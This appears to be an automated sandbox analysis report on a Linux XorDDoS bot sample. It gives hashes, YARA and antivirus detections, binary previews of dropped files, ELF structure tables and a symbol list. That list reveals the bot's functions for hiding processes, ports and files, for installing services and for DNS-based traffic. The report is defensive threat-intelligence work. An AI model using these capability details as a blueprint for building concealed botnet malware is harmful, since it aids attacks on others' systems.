                                                                                Preview: .ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                /usr/bin/rlyjyybyum
                                                                                Process:/tmp/4ljhdTTyiA
                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                Category:dropped
                                                                                Size (bytes):625900
                                                                                Entropy (8bit):6.2444741953981735
                                                                                Encrypted:false
                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrIT6yF8EEP4UlUuTh1An:FBXmkN/+Fhu/Qo4h9L+zNNIBVEBl/91y
                                                                                MD5:0713019B4738A770E7B6E1A45B02C8D9
                                                                                SHA1:3DF2C425A9191BCACEF32822552C0A31CA8732CB
                                                                                SHA-256:208DFEC353CE8DF021304E7F7D47369F3AE66F36B13AFDED3862FE732303FAD0
                                                                                SHA-512:39F4E408C0E50ABB0CC30393FB125F2EB7E8D9A08B66D2914168BCF09D84D15F8688C8A2F04488DE83F74D08BC0EC4035B785B2733E7D85126150595FB90806D
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/rlyjyybyum, Author: Joe Security
                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/rlyjyybyum, Author: Akamai CSIRT
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Preview: .ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                /usr/bin/tjdqviitkh
                                                                                Process:/tmp/4ljhdTTyiA
                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                Category:dropped
                                                                                Size (bytes):625900
                                                                                Entropy (8bit):6.244470630901578
                                                                                Encrypted:false
                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrIT6yF8EEP4UlUuTh1Az:FBXmkN/+Fhu/Qo4h9L+zNNIBVEBl/91O
                                                                                MD5:C2561C3AFE2388B8727667FCEFB207B7
                                                                                SHA1:B68150F2061322A2848E760F1C51758C54B20821
                                                                                SHA-256:6657FAAF31B31FAD93A19A229620004238CB5D1143D82DF82FF3902E632F3D58
                                                                                SHA-512:50FEF6B392D7ABEE0C170CF1CB98C0AA201B08016C727566EB925256C12AA87A72918DA2CCD84BAD0DF370E309295928FA3923FF87CFC366558A839998203D00
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/tjdqviitkh, Author: Joe Security
                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/tjdqviitkh, Author: Akamai CSIRT
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Preview: .ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                /usr/bin/uoewtvxqdd
                                                                                Process:/tmp/4ljhdTTyiA
                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                Category:dropped
                                                                                Size (bytes):625900
                                                                                Entropy (8bit):6.244472274746616
                                                                                Encrypted:false
                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrIT6yF8EEP4UlUuTh1A2:FBXmkN/+Fhu/Qo4h9L+zNNIBVEBl/913
                                                                                MD5:39AA00025C468148F76C1297AE9E076E
                                                                                SHA1:5EE5179AF09781EB6A4ABD267748F46482A665E8
                                                                                SHA-256:E01A3A42DCAA06BAC19B6E7FC383CECA2B69649CE5E60D3C95FAE8DEAC6725F7
                                                                                SHA-512:B85CD1A6AB6B40B1F1EAACA555DF6165E30099AC745674534873348847F34186A2C0F7EA15F5DB0B9A1B6ACAE52A6F948AB46BC07AB15A23B27584EDD5B2A7DD
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/uoewtvxqdd, Author: Joe Security
                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/uoewtvxqdd, Author: Akamai CSIRT
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Preview: .ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

                                                                                Static File Info

                                                                                General

                                                                                File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                Entropy (8bit):6.2444373366686925
                                                                                TrID:
                                                                                • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                                                • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                                                File name:4ljhdTTyiA
                                                                                File size:625889
                                                                                MD5:349456ecaa1380a142f15810a8260378
                                                                                SHA1:02dd15ecdeedefd7a2f82ba0df38703a74489af3
                                                                                SHA256:0f00c2e074c6284c556040012ef23357853ccac4ad1373d1dea683562dc24bca
                                                                                SHA512:85d5dad44636f240be2943bc1e2ea0196af08ee778c4ebe055c237dffdc291ee34c4eedafc70d0c6dc6d8cdf2c48d1e296cf65c6bcbaa37e59fa276773961f0c
                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrIT6yF8EEP4UlUuTh1Au:FBXmkN/+Fhu/Qo4h9L+zNNIBVEBl/91l
                                                                                File Content Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r.......................... ... ................a..............@...........Q.td........................................GNU.................U......5...

                                                                                Static ELF Info

                                                                                ELF header

                                                                                Class:ELF32
                                                                                Data:2's complement, little endian
                                                                                Version:1 (current)
                                                                                Machine:Intel 80386
                                                                                Version Number:0x1
                                                                                Type:EXEC (Executable file)
                                                                                OS/ABI:UNIX - System V
                                                                                ABI Version:0
                                                                                Entry Point Address:0x8048110
                                                                                Flags:0x0
                                                                                ELF Header Size:52
                                                                                Program Header Offset:52
                                                                                Program Header Size:32
                                                                                Number of Program Headers:5
                                                                                Section Header Offset:553480
                                                                                Section Header Size:40
                                                                                Number of Section Headers:28
                                                                                Header String Table Index:25

                                                                                Sections

                                                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                NULL0x00x00x00x00x0000
                                                                                .note.ABI-tagNOTE0x80480d40xd40x200x00x2A004
                                                                                .initPROGBITS0x80480f40xf40x170x00x6AX004
                                                                                .textPROGBITS0x80481100x1100x697d80x00x6AX0016
                                                                                __libc_freeres_fnPROGBITS0x80b18f00x698f00x100f0x00x6AX0016
                                                                                __libc_thread_freeres_fnPROGBITS0x80b29000x6a9000x1db0x00x6AX0016
                                                                                .finiPROGBITS0x80b2adc0x6aadc0x1c0x00x6AX004
                                                                                .rodataPROGBITS0x80b2b000x6ab000x153c00x00x2A0032
                                                                                __libc_subfreeresPROGBITS0x80c7ec00x7fec00x300x00x2A004
                                                                                __libc_atexitPROGBITS0x80c7ef00x7fef00x40x00x2A004
                                                                                __libc_thread_subfreeresPROGBITS0x80c7ef40x7fef40x80x00x2A004
                                                                                .eh_framePROGBITS0x80c7efc0x7fefc0x60f40x00x2A004
                                                                                .gcc_except_tablePROGBITS0x80cdff00x85ff00x11b0x00x2A001
                                                                                .tdataPROGBITS0x80cf10c0x8610c0x140x00x403WAT004
                                                                                .tbssNOBITS0x80cf1200x861200x2c0x00x403WAT004
                                                                                .ctorsPROGBITS0x80cf1200x861200x80x00x3WA004
                                                                                .dtorsPROGBITS0x80cf1280x861280xc0x00x3WA004
                                                                                .jcrPROGBITS0x80cf1340x861340x40x00x3WA004
                                                                                .data.rel.roPROGBITS0x80cf1380x861380x2c0x00x3WA004
                                                                                .gotPROGBITS0x80cf1640x861640x80x40x3WA004
                                                                                .got.pltPROGBITS0x80cf16c0x8616c0xc0x40x3WA004
                                                                                .dataPROGBITS0x80cf1800x861800xb400x00x3WA0032
                                                                                .bssNOBITS0x80cfcc00x86cc00x67180x00x3WA0032
                                                                                __libc_freeres_ptrsNOBITS0x80d63d80x86cc00x140x00x3WA004
                                                                                .commentPROGBITS0x00x86cc00x4220x00x0001
                                                                                .shstrtabSTRTAB0x00x870e20x1260x00x0001
                                                                                .symtabSYMTAB0x00x876680x93c00x100x0279144
                                                                                .strtabSTRTAB0x00x90a280x82a30x00x0001

                                                                                Program Segments

                                                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                LOAD0x00x80480000x80480000x8610b0x8610b3.33960x5R E0x1000.note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
                                                                                LOAD0x8610c0x80cf10c0x80cf10c0xbb40x72e02.92410x6RW 0x1000.ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
                                                                                NOTE0xd40x80480d40x80480d40x200x201.74870x4R 0x4.note.ABI-tag
                                                                                TLS0x8610c0x80cf10c0x80cf10c0x140x401.61270x4R 0x4
                                                                                GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

                                                                                Symbols

                                                                                NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                                                                .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                .symtab0x80480d40SECTION<unknown>DEFAULT1
                                                                                .symtab0x80480f40SECTION<unknown>DEFAULT2
                                                                                .symtab0x80481100SECTION<unknown>DEFAULT3
                                                                                .symtab0x80b18f00SECTION<unknown>DEFAULT4
                                                                                .symtab0x80b29000SECTION<unknown>DEFAULT5
                                                                                .symtab0x80b2adc0SECTION<unknown>DEFAULT6
                                                                                .symtab0x80b2b000SECTION<unknown>DEFAULT7
                                                                                .symtab0x80c7ec00SECTION<unknown>DEFAULT8
                                                                                .symtab0x80c7ef00SECTION<unknown>DEFAULT9
                                                                                .symtab0x80c7ef40SECTION<unknown>DEFAULT10
                                                                                .symtab0x80c7efc0SECTION<unknown>DEFAULT11
                                                                                .symtab0x80cdff00SECTION<unknown>DEFAULT12
                                                                                .symtab0x80cf10c0SECTION<unknown>DEFAULT13
                                                                                .symtab0x80cf1200SECTION<unknown>DEFAULT14
                                                                                .symtab0x80cf1200SECTION<unknown>DEFAULT15
                                                                                .symtab0x80cf1280SECTION<unknown>DEFAULT16
                                                                                .symtab0x80cf1340SECTION<unknown>DEFAULT17
                                                                                .symtab0x80cf1380SECTION<unknown>DEFAULT18
                                                                                .symtab0x80cf1640SECTION<unknown>DEFAULT19
                                                                                .symtab0x80cf16c0SECTION<unknown>DEFAULT20
                                                                                .symtab0x80cf1800SECTION<unknown>DEFAULT21
                                                                                .symtab0x80cfcc00SECTION<unknown>DEFAULT22
                                                                                .symtab0x80d63d80SECTION<unknown>DEFAULT23
                                                                                .symtab0x00SECTION<unknown>DEFAULT24
                                                                                .L108.symtab0x80ad9500NOTYPE<unknown>DEFAULT3
                                                                                .L113.symtab0x80ad9900NOTYPE<unknown>DEFAULT3
                                                                                .L114.symtab0x80ad9f80NOTYPE<unknown>DEFAULT3
                                                                                .L115.symtab0x80ada300NOTYPE<unknown>DEFAULT3
                                                                                .L116.symtab0x80ada4e0NOTYPE<unknown>DEFAULT3
                                                                                .L117.symtab0x80ada6c0NOTYPE<unknown>DEFAULT3
                                                                                .L118.symtab0x80ada890NOTYPE<unknown>DEFAULT3
                                                                                .L119.symtab0x80adabd0NOTYPE<unknown>DEFAULT3
                                                                                .L12.symtab0x80b130b0NOTYPE<unknown>DEFAULT3
                                                                                .L120.symtab0x80adadc0NOTYPE<unknown>DEFAULT3
                                                                                .L121.symtab0x80adafb0NOTYPE<unknown>DEFAULT3
                                                                                .L122.symtab0x80ad8e30NOTYPE<unknown>DEFAULT3
                                                                                .L123.symtab0x80adb2b0NOTYPE<unknown>DEFAULT3
                                                                                .L124.symtab0x80add7f0NOTYPE<unknown>DEFAULT3
                                                                                .L125.symtab0x80addb40NOTYPE<unknown>DEFAULT3
                                                                                .L126.symtab0x80add020NOTYPE<unknown>DEFAULT3
                                                                                .L127.symtab0x80add1f0NOTYPE<unknown>DEFAULT3
                                                                                .L128.symtab0x80add460NOTYPE<unknown>DEFAULT3
                                                                                .L129.symtab0x80add630NOTYPE<unknown>DEFAULT3
                                                                                .L130.symtab0x80adb8c0NOTYPE<unknown>DEFAULT3
                                                                                .L131.symtab0x80adbd30NOTYPE<unknown>DEFAULT3
                                                                                .L132.symtab0x80adc000NOTYPE<unknown>DEFAULT3
                                                                                .L133.symtab0x80adc370NOTYPE<unknown>DEFAULT3
                                                                                .L134.symtab0x80adc500NOTYPE<unknown>DEFAULT3
                                                                                .L135.symtab0x80adc7d0NOTYPE<unknown>DEFAULT3
                                                                                .L136.symtab0x80adcb50NOTYPE<unknown>DEFAULT3
                                                                                .L137.symtab0x80adcc90NOTYPE<unknown>DEFAULT3
                                                                                .L14.symtab0x80b14190NOTYPE<unknown>DEFAULT3
                                                                                .L15.symtab0x80b14080NOTYPE<unknown>DEFAULT3
                                                                                .L16.symtab0x80b13f80NOTYPE<unknown>DEFAULT3
                                                                                .L17.symtab0x80b13e80NOTYPE<unknown>DEFAULT3
                                                                                .L18.symtab0x80b138c0NOTYPE<unknown>DEFAULT3
                                                                                .L19.symtab0x80b137e0NOTYPE<unknown>DEFAULT3
                                                                                .L20.symtab0x80b13450NOTYPE<unknown>DEFAULT3
                                                                                .L21.symtab0x80b13710NOTYPE<unknown>DEFAULT3
                                                                                .L258.symtab0x80ae76c0NOTYPE<unknown>DEFAULT3
                                                                                .L259.symtab0x80ae4a00NOTYPE<unknown>DEFAULT3
                                                                                .L260.symtab0x80ae5f70NOTYPE<unknown>DEFAULT3
                                                                                .L261.symtab0x80ae7c00NOTYPE<unknown>DEFAULT3
                                                                                .L262.symtab0x80ae5e90NOTYPE<unknown>DEFAULT3
                                                                                .L264.symtab0x80ae43d0NOTYPE<unknown>DEFAULT3
                                                                                .L266.symtab0x80ae4960NOTYPE<unknown>DEFAULT3
                                                                                .L267.symtab0x80ae68f0NOTYPE<unknown>DEFAULT3
                                                                                .L268.symtab0x80ae6a00NOTYPE<unknown>DEFAULT3
                                                                                .L269.symtab0x80ae6050NOTYPE<unknown>DEFAULT3
                                                                                .L270.symtab0x80ae6280NOTYPE<unknown>DEFAULT3
                                                                                .L271.symtab0x80ae6420NOTYPE<unknown>DEFAULT3
                                                                                .L272.symtab0x80ae6640NOTYPE<unknown>DEFAULT3
                                                                                .L273.symtab0x80ae4ab0NOTYPE<unknown>DEFAULT3
                                                                                .L274.symtab0x80ae4e40NOTYPE<unknown>DEFAULT3
                                                                                .L275.symtab0x80ae5990NOTYPE<unknown>DEFAULT3
                                                                                .L276.symtab0x80ae55f0NOTYPE<unknown>DEFAULT3
                                                                                .L277.symtab0x80ae5da0NOTYPE<unknown>DEFAULT3
                                                                                .L278.symtab0x80ae8350NOTYPE<unknown>DEFAULT3
                                                                                .L279.symtab0x80ae7ce0NOTYPE<unknown>DEFAULT3
                                                                                .L280.symtab0x80ae7e00NOTYPE<unknown>DEFAULT3
                                                                                .L281.symtab0x80ae6b70NOTYPE<unknown>DEFAULT3
                                                                                .L282.symtab0x80ae70c0NOTYPE<unknown>DEFAULT3
                                                                                .L283.symtab0x80ae4670NOTYPE<unknown>DEFAULT3
                                                                                .L350.symtab0x80ae8400NOTYPE<unknown>DEFAULT3
                                                                                .L351.symtab0x80ae84a0NOTYPE<unknown>DEFAULT3
                                                                                .L352.symtab0x80ae8590NOTYPE<unknown>DEFAULT3
                                                                                .L353.symtab0x80ae8630NOTYPE<unknown>DEFAULT3
                                                                                .L354.symtab0x80ae8720NOTYPE<unknown>DEFAULT3
                                                                                .L355.symtab0x80ae87d0NOTYPE<unknown>DEFAULT3
                                                                                .L356.symtab0x80ae8870NOTYPE<unknown>DEFAULT3
                                                                                .L357.symtab0x80ae8920NOTYPE<unknown>DEFAULT3
                                                                                .L358.symtab0x80ae89e0NOTYPE<unknown>DEFAULT3
                                                                                .L359.symtab0x80ae8aa0NOTYPE<unknown>DEFAULT3
                                                                                .L360.symtab0x80ae8b30NOTYPE<unknown>DEFAULT3
                                                                                .L361.symtab0x80ae8bd0NOTYPE<unknown>DEFAULT3
                                                                                .L362.symtab0x80ae8cc0NOTYPE<unknown>DEFAULT3
                                                                                .L363.symtab0x80ae8db0NOTYPE<unknown>DEFAULT3
                                                                                .L364.symtab0x80ae8ea0NOTYPE<unknown>DEFAULT3
                                                                                .L365.symtab0x80ae8f90NOTYPE<unknown>DEFAULT3
                                                                                .L366.symtab0x80ae9080NOTYPE<unknown>DEFAULT3
                                                                                .L380.symtab0x80ae4380NOTYPE<unknown>DEFAULT3
                                                                                .L411.symtab0x80aeb100NOTYPE<unknown>DEFAULT3
                                                                                .L412.symtab0x80aeae60NOTYPE<unknown>DEFAULT3
                                                                                .L413.symtab0x80aeb540NOTYPE<unknown>DEFAULT3
                                                                                .L414.symtab0x80aebc00NOTYPE<unknown>DEFAULT3
                                                                                .L415.symtab0x80aec200NOTYPE<unknown>DEFAULT3
                                                                                .L416.symtab0x80aec600NOTYPE<unknown>DEFAULT3
                                                                                .L61.symtab0x80ad6730NOTYPE<unknown>DEFAULT3
                                                                                .L63.symtab0x80ad6ef0NOTYPE<unknown>DEFAULT3
                                                                                .L64.symtab0x80ad6ce0NOTYPE<unknown>DEFAULT3
                                                                                .L67.symtab0x80ad6de0NOTYPE<unknown>DEFAULT3
                                                                                .L68.symtab0x80ad6d60NOTYPE<unknown>DEFAULT3
                                                                                .L69.symtab0x80ad6a20NOTYPE<unknown>DEFAULT3
                                                                                .L70.symtab0x80ad6c20NOTYPE<unknown>DEFAULT3
                                                                                .L74.symtab0x80afb630NOTYPE<unknown>DEFAULT3
                                                                                .L76.symtab0x80afbdf0NOTYPE<unknown>DEFAULT3
                                                                                .L77.symtab0x80afbbe0NOTYPE<unknown>DEFAULT3
                                                                                .L80.symtab0x80afbce0NOTYPE<unknown>DEFAULT3
                                                                                .L81.symtab0x80afbc60NOTYPE<unknown>DEFAULT3
                                                                                .L82.symtab0x80afb920NOTYPE<unknown>DEFAULT3
                                                                                .L83.symtab0x80afbb20NOTYPE<unknown>DEFAULT3
                                                                                AddService.symtab0x8048865807FUNC<unknown>DEFAULT3
                                                                                CalcCrc32.symtab0x80492b470FUNC<unknown>DEFAULT3
                                                                                CalcFileCrc.symtab0x8049346172FUNC<unknown>DEFAULT3
                                                                                CalcFindIpCrc.symtab0x804932038FUNC<unknown>DEFAULT3
                                                                                CalcHeaderCrc.symtab0x80492fa38FUNC<unknown>DEFAULT3
                                                                                CheckLKM.symtab0x804a670107FUNC<unknown>DEFAULT3
                                                                                CreateDir.symtab0x80483de375FUNC<unknown>DEFAULT3
                                                                                DNS_ADDR.symtab0x80cf4cc16OBJECT<unknown>DEFAULT21
                                                                                DNS_ADDR2.symtab0x80cf4dc16OBJECT<unknown>DEFAULT21
                                                                                DNS_PORT.symtab0x80cf4ec4OBJECT<unknown>DEFAULT21
                                                                                DelService.symtab0x8048cdc275FUNC<unknown>DEFAULT3
                                                                                DelService_form_pid.symtab0x8048def113FUNC<unknown>DEFAULT3
                                                                                GetCpuInfo.symtab0x804e2ce539FUNC<unknown>DEFAULT3
                                                                                GetIndex.symtab0x804b418189FUNC<unknown>DEFAULT3
                                                                                GetLanSpeed.symtab0x804e5e1243FUNC<unknown>DEFAULT3
                                                                                GetMemStat.symtab0x804e1d9245FUNC<unknown>DEFAULT3
                                                                                Get_AllIP.symtab0x804ef5d375FUNC<unknown>DEFAULT3
                                                                                HideFile.symtab0x804a74d151FUNC<unknown>DEFAULT3
                                                                                HidePidPort.symtab0x804a6db114FUNC<unknown>DEFAULT3
                                                                                InstallSYS.symtab0x8048b8c336FUNC<unknown>DEFAULT3
                                                                                LinuxExec.symtab0x8048eed122FUNC<unknown>DEFAULT3
                                                                                LinuxExec_Argv.symtab0x8048f67135FUNC<unknown>DEFAULT3
                                                                                LinuxExec_Argv2.symtab0x8048fee148FUNC<unknown>DEFAULT3
                                                                                LogFacility.symtab0x80cfa0c4OBJECT<unknown>DEFAULT21
                                                                                LogFile.symtab0x80cfa084OBJECT<unknown>DEFAULT21
                                                                                LogMask.symtab0x80cfa004OBJECT<unknown>DEFAULT21
                                                                                LogStat.symtab0x80d50444OBJECT<unknown>DEFAULT22
                                                                                LogTag.symtab0x80d50484OBJECT<unknown>DEFAULT22
                                                                                LogType.symtab0x80cfa044OBJECT<unknown>DEFAULT21
                                                                                MAGIC_STR.symtab0x80d1f6033OBJECT<unknown>DEFAULT22
                                                                                MainList.symtab0x80d1fa0264OBJECT<unknown>DEFAULT22
                                                                                ReadWord.symtab0x804e150137FUNC<unknown>DEFAULT3
                                                                                SIZE_DNS_H.symtab0x80cf4a44OBJECT<unknown>DEFAULT21
                                                                                SIZE_DNS_T.symtab0x80cf4a84OBJECT<unknown>DEFAULT21
                                                                                SIZE_IP_H.symtab0x80cf4984OBJECT<unknown>DEFAULT21
                                                                                SIZE_PSEUDO_HDR.symtab0x80cf4ac4OBJECT<unknown>DEFAULT21
                                                                                SIZE_TCP_H.symtab0x80cf4a04OBJECT<unknown>DEFAULT21
                                                                                SIZE_UDP_H.symtab0x80cf49c4OBJECT<unknown>DEFAULT21
                                                                                SYS_BUF.symtab0x80cfce01OBJECT<unknown>DEFAULT22
                                                                                SyslogAddr.symtab0x80d5060110OBJECT<unknown>DEFAULT22
                                                                                THREAD_NUM.symtab0x80d61704OBJECT<unknown>DEFAULT22
                                                                                _Exit.symtab0x8067a2819FUNC<unknown>DEFAULT3
                                                                                _GLOBAL_OFFSET_TABLE_.symtab0x80cf16c0OBJECT<unknown>HIDDEN20
                                                                                _IO_2_1_stderr_.symtab0x80cf700152OBJECT<unknown>DEFAULT21
                                                                                _IO_2_1_stdin_.symtab0x80cf5c0152OBJECT<unknown>DEFAULT21
                                                                                _IO_2_1_stdout_.symtab0x80cf660152OBJECT<unknown>DEFAULT21
                                                                                _IO_adjust_column.symtab0x805c9b060FUNC<unknown>DEFAULT3
                                                                                _IO_adjust_wcolumn.symtab0x808477063FUNC<unknown>DEFAULT3
                                                                                _IO_cleanup.symtab0x805d310409FUNC<unknown>DEFAULT3
                                                                                _IO_default_doallocate.symtab0x805de10143FUNC<unknown>DEFAULT3
                                                                                _IO_default_finish.symtab0x805e310525FUNC<unknown>DEFAULT3
                                                                                _IO_default_imbue.symtab0x805cac05FUNC<unknown>DEFAULT3
                                                                                _IO_default_pbackfail.symtab0x805d900310FUNC<unknown>DEFAULT3
                                                                                _IO_default_read.symtab0x805ca9010FUNC<unknown>DEFAULT3
                                                                                _IO_default_seek.symtab0x805ca7015FUNC<unknown>DEFAULT3
                                                                                _IO_default_seekoff.symtab0x805c90015FUNC<unknown>DEFAULT3
                                                                                _IO_default_seekpos.symtab0x805c81059FUNC<unknown>DEFAULT3
                                                                                _IO_default_setbuf.symtab0x805dd10244FUNC<unknown>DEFAULT3
                                                                                _IO_default_showmanyc.symtab0x805cab010FUNC<unknown>DEFAULT3
                                                                                _IO_default_stat.symtab0x805ca8010FUNC<unknown>DEFAULT3
                                                                                _IO_default_sync.symtab0x805c8f07FUNC<unknown>DEFAULT3
                                                                                _IO_default_uflow.symtab0x805c7b052FUNC<unknown>DEFAULT3
                                                                                _IO_default_underflow.symtab0x805c7a010FUNC<unknown>DEFAULT3
                                                                                _IO_default_write.symtab0x805caa07FUNC<unknown>DEFAULT3
                                                                                _IO_default_xsgetn.symtab0x805e250185FUNC<unknown>DEFAULT3
                                                                                _IO_default_xsputn.symtab0x805cc80225FUNC<unknown>DEFAULT3
                                                                                _IO_do_write.symtab0x805bd80271FUNC<unknown>DEFAULT3
                                                                                _IO_doallocbuf.symtab0x805dc80133FUNC<unknown>DEFAULT3
                                                                                _IO_fclose.symtab0x8057df0439FUNC<unknown>DEFAULT3
                                                                                _IO_feof.symtab0x80596d0154FUNC<unknown>DEFAULT3
                                                                                _IO_fgets.symtab0x8057ff0360FUNC<unknown>DEFAULT3
                                                                                _IO_file_attach.symtab0x8059dc0133FUNC<unknown>DEFAULT3
                                                                                _IO_file_close.symtab0x805a94018FUNC<unknown>DEFAULT3
                                                                                _IO_file_close_it.symtab0x805b2f0581FUNC<unknown>DEFAULT3
                                                                                _IO_file_close_mmap.symtab0x805a96060FUNC<unknown>DEFAULT3
                                                                                _IO_file_doallocate.symtab0x80839b0275FUNC<unknown>DEFAULT3
                                                                                _IO_file_finish.symtab0x805c4a0327FUNC<unknown>DEFAULT3
                                                                                _IO_file_fopen.symtab0x805b5401388FUNC<unknown>DEFAULT3
                                                                                _IO_file_init.symtab0x805b04051FUNC<unknown>DEFAULT3
                                                                                _IO_file_jumps.symtab0x80b3e0084OBJECT<unknown>DEFAULT7
                                                                                _IO_file_jumps_maybe_mmap.symtab0x80b3ec084OBJECT<unknown>DEFAULT7
                                                                                _IO_file_jumps_mmap.symtab0x80b3e6084OBJECT<unknown>DEFAULT7
                                                                                _IO_file_open.symtab0x805af30263FUNC<unknown>DEFAULT3
                                                                                _IO_file_overflow.symtab0x805c0301131FUNC<unknown>DEFAULT3
                                                                                _IO_file_read.symtab0x805a9d048FUNC<unknown>DEFAULT3
                                                                                _IO_file_seek.symtab0x8059fd018FUNC<unknown>DEFAULT3
                                                                                _IO_file_seekoff.symtab0x805aa001245FUNC<unknown>DEFAULT3
                                                                                _IO_file_seekoff_maybe_mmap.symtab0x8059f8080FUNC<unknown>DEFAULT3
                                                                                _IO_file_seekoff_mmap.symtab0x8059e50297FUNC<unknown>DEFAULT3
                                                                                _IO_file_setbuf.symtab0x805aee075FUNC<unknown>DEFAULT3
                                                                                _IO_file_setbuf_mmap.symtab0x805b270115FUNC<unknown>DEFAULT3
                                                                                _IO_file_stat.symtab0x805a9a037FUNC<unknown>DEFAULT3
                                                                                _IO_file_sync.symtab0x805be90406FUNC<unknown>DEFAULT3
                                                                                _IO_file_sync_mmap.symtab0x8059ff0165FUNC<unknown>DEFAULT3
                                                                                _IO_file_underflow.symtab0x805b080495FUNC<unknown>DEFAULT3
                                                                                _IO_file_underflow_maybe_mmap.symtab0x805a2e030FUNC<unknown>DEFAULT3
                                                                                _IO_file_underflow_mmap.symtab0x805a6b066FUNC<unknown>DEFAULT3
                                                                                _IO_file_write.symtab0x805a890166FUNC<unknown>DEFAULT3
                                                                                _IO_file_xsgetn.symtab0x805a700394FUNC<unknown>DEFAULT3
